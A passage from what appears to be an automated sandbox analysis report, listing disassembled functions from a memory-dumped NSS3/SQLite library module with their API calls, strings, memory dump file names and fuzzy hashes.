                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A422DE716083419FC704CFA9C69062AB7E1BFDA354F14CB2DE8DA97A81D731D85ACB42
                                                                                                                                                                                                                                                                                          Function 6C7C9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C688637,?,?), ref: 6C7C9E88
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C688637), ref: 6C7C9ED6
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C7C9ECF
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7C9EC0
                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C7C9ECA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: fa61cb5a8d89c5edb1b783af96eb0942b4c5ec2e817246869beaf6f2b01f6a48
                                                                                                                                                                                                                                                                                          • Instruction ID: 4968d5a6865e24579db08fcfc9e4fa45d106a9d02b9d103896be67be4d45d295
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa61cb5a8d89c5edb1b783af96eb0942b4c5ec2e817246869beaf6f2b01f6a48
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F81B431B012168FCB54CF69CA84ADEB3F6EF58308B148579E819AB741E731ED45CB91
                                                                                                                                                                                                                                                                                          Function 6C7D7F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7D81BC
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                          • String ID: BINARY$out of memory
                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-3971123528
                                                                                                                                                                                                                                                                                          • Opcode ID: 6505d4be27bc8ba8760a7c82b0e089a8d06d98153b367c6aef28162ad6d939b2
                                                                                                                                                                                                                                                                                          • Instruction ID: 54ac1c9cda6178e7fea2de37238f3c2fe82024769af212ed3af9e2a57143ce19
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6505d4be27bc8ba8760a7c82b0e089a8d06d98153b367c6aef28162ad6d939b2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2952BF71E01218DFDB14CF99C980BADBBB1FF48318F26916AD859AB751D730B846CB90
                                                                                                                                                                                                                                                                                          Function 6C759EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C759ED6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C759EE4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C759F38
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75D030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C759F0B), ref: 6C75D03B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75D030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C75D04E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75D030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C75D07B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75D030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C75D08E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75D030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C75D09D
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C759F49
                                                                                                                                                                                                                                                                                          • SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C759F59
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C759D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C759C5B), ref: 6C759D82
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C759D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C759C5B), ref: 6C759DA9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C759D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C759C5B), ref: 6C759DCE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C759D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C759C5B), ref: 6C759E43
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4287675220-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                                                                                                                                          • Instruction ID: ac4f14f3fcf2ab87062b84f300bd02962e47c6a75c3b4e2b4334ab15fd387111
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311E9E5F042015BEB009F65AE09B9B7254AFA435DF940134E40987780FF62E5758692
                                                                                                                                                                                                                                                                                          Function 6C80CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C80D086
                                                                                                                                                                                                                                                                                          • PR_Malloc.NSS3(00000001), ref: 6C80D0B9
                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C80D138
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                                                                          • String ID: >
                                                                                                                                                                                                                                                                                          • API String ID: 1782319670-325317158
                                                                                                                                                                                                                                                                                          • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                          • Instruction ID: 34de5f5d48885cec44ac06ee80816b5179f95a8cd7c744c07fb667c02d555421
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71D15E62B4154A4FFB344C7C8EA13E9B7938B42374F584B2AD5219BBE7E919C843C352
                                                                                                                                                                                                                                                                                          Function 6C7AAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 6c1d8b0e8890fd83e3a1f11e60c84b86ccef08c623210570b8696d156a3524fa
                                                                                                                                                                                                                                                                                          • Instruction ID: 185ac421066439f62438421faadb70877ccf0f0d3834c725f704b82e74e88156
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c1d8b0e8890fd83e3a1f11e60c84b86ccef08c623210570b8696d156a3524fa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF1E171E011198BEB24DFA8CA503AAB7F1BB8A30DF55823DC915D7740E7B4A942CBC1
                                                                                                                                                                                                                                                                                          Function 6C79DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C675001,?,00000003,00000000), ref: 6C79DFD7
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C675001,?), ref: 6C79E2B7
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C675001,?), ref: 6C79E2DA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpymemsetstrlen
                                                                                                                                                                                                                                                                                          • String ID: W
                                                                                                                                                                                                                                                                                          • API String ID: 160209724-655174618
                                                                                                                                                                                                                                                                                          • Opcode ID: 0e2893d385622f4ebbb38cd5795460940ac91713e75502ca7651cd3ad1bbe3b0
                                                                                                                                                                                                                                                                                          • Instruction ID: d25ac073ee6cbe3408a85476ecf0b1b8713f762630214ed6b8accabb5f7793a2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e2893d385622f4ebbb38cd5795460940ac91713e75502ca7651cd3ad1bbe3b0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCC12B71B4465DCBDB04CF29D6907AA77B2BF8A308F288179DCA99BB41D7319801CBD1
                                                                                                                                                                                                                                                                                          Function 6C760E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C761052
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C761086
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                                                                          • String ID: h(vl$h(vl
                                                                                                                                                                                                                                                                                          • API String ID: 1297977491-440653490
                                                                                                                                                                                                                                                                                          • Opcode ID: 281aa94879d370cd60504bc2d56289c407d33e5b0fe09af85424f5a7c43f1071
                                                                                                                                                                                                                                                                                          • Instruction ID: a2c85e4929b83f5740405df8345a4ee5104dadb77298a0ea2725030d95d5da79
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 281aa94879d370cd60504bc2d56289c407d33e5b0fe09af85424f5a7c43f1071
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8A13E71B0125A9FDF08CF9AC994AEEB7B6BF88314B148139E915A7B00D735EC11CB94
                                                                                                                                                                                                                                                                                          Function 6C686F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
                                                                                                                                                                                                                                                                                          • API String ID: 0-3485574213
                                                                                                                                                                                                                                                                                          • Opcode ID: f1c10f171448ace36573513c61873d7c1812da7e5b1492e70cea6b91b8c9adb2
                                                                                                                                                                                                                                                                                          • Instruction ID: 47437d6f5831b58f91521232e0c90cb0eba08ebd7513b09fee92f7e46dadf64d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1c10f171448ace36573513c61873d7c1812da7e5b1492e70cea6b91b8c9adb2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC718C72F122114BEB108E6DC8803DA73A39F85318F294239DD59ABFD1D671DC4687E9
                                                                                                                                                                                                                                                                                          Function 6C6A3EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: sqlite_$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                                                                                                          • API String ID: 0-4221611869
                                                                                                                                                                                                                                                                                          • Opcode ID: e37c0b5a8ad13d3c3099188038e0175953d432c86f74cb352f750014b759cf41
                                                                                                                                                                                                                                                                                          • Instruction ID: 5c6862dc5cda942c8c4356d197bc1d65ce34f3ddf781f0f86c417a2e9bf7eed0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e37c0b5a8ad13d3c3099188038e0175953d432c86f74cb352f750014b759cf41
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA229D30B491958FD7148BA588601F67BF2DF47309F6C69A8C9E15FA43CA66EC43C788
                                                                                                                                                                                                                                                                                          Function 6C7DBE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                                                                                                                          • API String ID: 0-2679148245
                                                                                                                                                                                                                                                                                          • Opcode ID: 754e7d71ec0211e47733cd435afb564e9e9a9692bd74591c26d1f41a6b75cc96
                                                                                                                                                                                                                                                                                          • Instruction ID: 93bdb3f6fb10a4054260f35bd247ea9592d6de50e02bca2eeae8c018dc911d7c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 754e7d71ec0211e47733cd435afb564e9e9a9692bd74591c26d1f41a6b75cc96
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E928F74A0024A8FDB05DF94CA80BAEB7B2FF89309F294168D415A7B91D735FC46CB54
                                                                                                                                                                                                                                                                                          Function 6C673D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
